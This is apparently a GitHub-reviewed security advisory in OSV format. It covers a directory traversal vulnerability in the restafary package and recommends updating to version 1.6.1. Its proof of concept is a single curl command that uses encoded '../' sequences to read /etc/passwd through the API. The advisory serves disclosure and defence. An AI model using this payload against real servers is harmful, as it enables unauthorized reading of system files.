OSV 1.4.0 · github-reviewed · 修改于 2020-09-01 02:10
发布时间
2019-02-19 07:39
GitHub 审查时间
2020-06-17 06:03
NVD 发布时间
—
源文件
advisories/github-reviewed/2019/02/GHSA-xg5r-8j97-2wrj/GHSA-xg5r-8j97-2wrj.json
Affected versions of restafary are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.
Proof of Concept
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'
Update to version 1.6.1 or later.